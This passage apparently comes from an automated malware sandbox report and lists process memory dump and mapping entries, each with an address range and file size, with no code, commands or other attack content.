                                                  • memory/300-109-0x0000000000400000-0x000000000106D000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/300-108-0x0000000000000000-mapping.dmp
                                                  • memory/300-113-0x0000000000400000-0x000000000106D000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/300-80-0x0000000000000000-mapping.dmp
                                                  • memory/300-114-0x0000000077420000-0x00000000775C9000-memory.dmp
                                                    Filesize

                                                    1.7MB

                                                  • memory/368-150-0x0000000000000000-mapping.dmp
                                                  • memory/368-137-0x0000000000000000-mapping.dmp
                                                  • memory/368-117-0x0000000000000000-mapping.dmp
                                                  • memory/548-134-0x0000000000000000-mapping.dmp
                                                  • memory/568-107-0x0000000000000000-mapping.dmp
                                                  • memory/572-105-0x0000000000000000-mapping.dmp
                                                  • memory/572-85-0x0000000000000000-mapping.dmp
                                                  • memory/628-115-0x000000001A7B0000-0x000000001ABCC000-memory.dmp
                                                    Filesize

                                                    4.1MB

                                                  • memory/628-104-0x0000000000000000-mapping.dmp
                                                  • memory/628-143-0x0000000000B10000-0x0000000000B16000-memory.dmp
                                                    Filesize

                                                    24KB

                                                  • memory/628-81-0x0000000000000000-mapping.dmp
                                                  • memory/804-84-0x0000000000000000-mapping.dmp
                                                  • memory/828-152-0x0000000000000000-mapping.dmp
                                                  • memory/828-128-0x0000000000000000-mapping.dmp
                                                  • memory/828-88-0x0000000000000000-mapping.dmp
                                                  • memory/836-99-0x0000000000000000-mapping.dmp
                                                  • memory/836-142-0x0000000000000000-mapping.dmp
                                                  • memory/856-147-0x0000000000000000-mapping.dmp
                                                  • memory/868-95-0x0000000000000000-mapping.dmp
                                                  • memory/912-70-0x0000000000000000-mapping.dmp
                                                  • memory/912-73-0x000007FEECE50000-0x000007FEED9AD000-memory.dmp
                                                    Filesize

                                                    11.4MB

                                                  • memory/912-90-0x0000000000000000-mapping.dmp
                                                  • memory/912-71-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/912-72-0x000007FEED9B0000-0x000007FEEE3D3000-memory.dmp
                                                    Filesize

                                                    10.1MB

                                                  • memory/912-74-0x0000000002354000-0x0000000002357000-memory.dmp
                                                    Filesize

                                                    12KB

                                                  • memory/912-148-0x0000000000000000-mapping.dmp
                                                  • memory/912-77-0x0000000002354000-0x0000000002357000-memory.dmp
                                                    Filesize

                                                    12KB

                                                  • memory/912-75-0x000000001B810000-0x000000001BB0F000-memory.dmp
                                                    Filesize

                                                    3.0MB

                                                  • memory/912-135-0x0000000000000000-mapping.dmp
                                                  • memory/912-78-0x000000000235B000-0x000000000237A000-memory.dmp
                                                    Filesize

                                                    124KB

                                                  • memory/912-76-0x000000000235B000-0x000000000237A000-memory.dmp
                                                    Filesize

                                                    124KB

                                                  • memory/920-93-0x0000000000000000-mapping.dmp
                                                  • memory/932-67-0x0000000000400000-0x000000000106D000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/932-68-0x0000000077420000-0x00000000775C9000-memory.dmp
                                                    Filesize

                                                    1.7MB

                                                  • memory/932-66-0x0000000077420000-0x00000000775C9000-memory.dmp
                                                    Filesize

                                                    1.7MB

                                                  • memory/932-65-0x0000000000400000-0x000000000106D000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/932-61-0x0000000000400000-0x000000000106D000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/932-56-0x0000000000000000-mapping.dmp
                                                  • memory/1088-94-0x0000000000000000-mapping.dmp
                                                  • memory/1112-86-0x0000000000000000-mapping.dmp
                                                  • memory/1112-106-0x0000000000000000-mapping.dmp
                                                  • memory/1112-136-0x0000000000000000-mapping.dmp
                                                  • memory/1132-145-0x0000000000000000-mapping.dmp
                                                  • memory/1160-110-0x0000000001280000-0x0000000001EED000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/1168-151-0x0000000000000000-mapping.dmp
                                                  • memory/1168-92-0x0000000000000000-mapping.dmp
                                                  • memory/1184-154-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-185-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-160-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-159-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-158-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-132-0x0000000000000000-mapping.dmp
                                                  • memory/1184-156-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-162-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1184-155-0x0000000000400000-0x000000000040C000-memory.dmp
                                                    Filesize

                                                    48KB

                                                  • memory/1220-140-0x0000000000000000-mapping.dmp
                                                  • memory/1248-125-0x0000000000000000-mapping.dmp
                                                  • memory/1256-131-0x0000000000000000-mapping.dmp
                                                  • memory/1260-79-0x0000000000000000-mapping.dmp
                                                  • memory/1268-133-0x0000000000000000-mapping.dmp
                                                  • memory/1316-172-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-186-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-193-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-163-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-192-0x0000000000420000-0x0000000000440000-memory.dmp
                                                    Filesize

                                                    128KB

                                                  • memory/1316-166-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-168-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-170-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-164-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-179-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-173-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-174-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-184-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-182-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-180-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1316-176-0x0000000140000000-0x0000000140803000-memory.dmp
                                                    Filesize

                                                    8.0MB

                                                  • memory/1396-129-0x0000000000000000-mapping.dmp
                                                  • memory/1396-139-0x0000000000000000-mapping.dmp
                                                  • memory/1396-98-0x0000000000000000-mapping.dmp
                                                  • memory/1432-138-0x0000000000000000-mapping.dmp
                                                  • memory/1432-60-0x0000000000000000-mapping.dmp
                                                  • memory/1440-83-0x0000000000000000-mapping.dmp
                                                  • memory/1516-153-0x0000000000000000-mapping.dmp
                                                  • memory/1548-126-0x0000000000000000-mapping.dmp
                                                  • memory/1556-149-0x0000000000000000-mapping.dmp
                                                  • memory/1556-127-0x0000000000000000-mapping.dmp
                                                  • memory/1556-101-0x0000000000000000-mapping.dmp
                                                  • memory/1560-82-0x0000000000000000-mapping.dmp
                                                  • memory/1576-144-0x0000000000000000-mapping.dmp
                                                  • memory/1592-122-0x0000000001094000-0x0000000001097000-memory.dmp
                                                    Filesize

                                                    12KB

                                                  • memory/1592-124-0x000000000109B000-0x00000000010BA000-memory.dmp
                                                    Filesize

                                                    124KB

                                                  • memory/1592-120-0x000007FEECD70000-0x000007FEED793000-memory.dmp
                                                    Filesize

                                                    10.1MB

                                                  • memory/1592-118-0x0000000000000000-mapping.dmp
                                                  • memory/1592-121-0x000007FEEC210000-0x000007FEECD6D000-memory.dmp
                                                    Filesize

                                                    11.4MB

                                                  • memory/1592-123-0x0000000001094000-0x0000000001097000-memory.dmp
                                                    Filesize

                                                    12KB

                                                  • memory/1608-96-0x0000000000000000-mapping.dmp
                                                  • memory/1624-190-0x0000000000200000-0x0000000000206000-memory.dmp
                                                    Filesize

                                                    24KB

                                                  • memory/1624-191-0x0000000000060000-0x0000000000067000-memory.dmp
                                                    Filesize

                                                    28KB

                                                  • memory/1632-102-0x0000000000000000-mapping.dmp
                                                  • memory/1632-146-0x0000000000000000-mapping.dmp
                                                  • memory/1636-103-0x0000000000000000-mapping.dmp
                                                  • memory/1656-130-0x0000000000000000-mapping.dmp
                                                  • memory/1660-141-0x0000000000000000-mapping.dmp
                                                  • memory/1776-89-0x0000000000000000-mapping.dmp
                                                  • memory/1776-97-0x0000000000000000-mapping.dmp
                                                  • memory/1884-58-0x0000000003580000-0x00000000041ED000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/1884-54-0x0000000075191000-0x0000000075193000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/1892-87-0x0000000000000000-mapping.dmp
                                                  • memory/1932-69-0x0000000000240000-0x000000000065C000-memory.dmp
                                                    Filesize

                                                    4.1MB

                                                  • memory/1980-91-0x0000000000000000-mapping.dmp
                                                  • memory/1984-100-0x0000000000000000-mapping.dmp